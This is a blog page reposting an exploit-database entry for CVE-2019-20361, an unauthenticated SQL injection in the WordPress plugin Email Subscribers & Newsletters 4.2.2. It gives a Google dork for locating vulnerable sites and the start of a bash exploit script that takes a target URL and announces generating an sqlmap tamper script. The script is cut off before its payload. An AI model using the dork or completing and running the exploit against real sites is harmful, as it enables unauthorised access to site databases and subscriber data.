This Blog is protected by DMCA.com

This Blog is protected by DMCA.com

qRbQCE31NMrtFvtKOB4Z5hNkGEPLdMi5yDIujADC

WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)

 WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)


WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361

main () {
header
if [ "$#" -ne 1 ]; then
echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
exit
fi

url=$1
echo ' Target URL : ' "$url"
echo ' Generating sqlmap tamper script in /tmp'
Related Posts

Related Posts

Posting Komentar